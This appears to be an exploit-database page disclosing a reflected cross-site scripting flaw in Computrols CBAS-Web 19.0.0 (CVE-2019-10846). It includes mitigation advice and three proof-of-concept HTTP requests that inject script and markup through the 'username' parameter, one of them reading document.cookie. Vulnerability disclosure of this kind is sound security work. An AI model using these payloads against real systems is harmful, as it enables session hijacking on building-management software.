header-logo
Suggest Exploit
vendor:
CBAS-Web
by:
LiquidWorm
6.1
CVSS
MEDIUM
Reflected Cross-Site Scripting
79
CWE
Product Name: CBAS-Web
Affected Version From: 19.0.0
Affected Version To: 19.0.0
Patch Exists: YES
Related CWE: CVE-2019-10846
CPE: a:computrols:cbas-web:19.0.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: NA
2018

Computrols CBAS-Web 19.0.0 – ‘username’ Reflected Cross-Site Scripting

Computrols CBAS-Web 19.0.0 is vulnerable to Reflected Cross-Site Scripting. This vulnerability is due to insufficient sanitization of user-supplied input in the 'username' parameter of the 'index.php' script when handling requests to the 'm=auth&a=verifyid' and 'm=auth&a=login' scripts. An attacker can exploit this vulnerability to execute arbitrary HTML and script code in a user's browser session in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to update a web page. All input data should be validated and filtered for malicious content. It is also recommended to use a whitelist of accepted input values.
Source

Exploit-DB raw data:

# Exploit Title: Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10846
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1

username="><script>confirm(document.cookie)</script>&submit_button=Send+Me+a+New+Password+Via+Email

=======

POST /cbas/index.php?m=auth&a=login HTTP/1.1

username="><marquee>htmlinjection</marquee>&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62

=======

GET /cbas/index.php?m=auth&a=login&username="><marquee>my milkshake brings all the boys to the yard.</marquee>&password=damn_right HTTP/1.1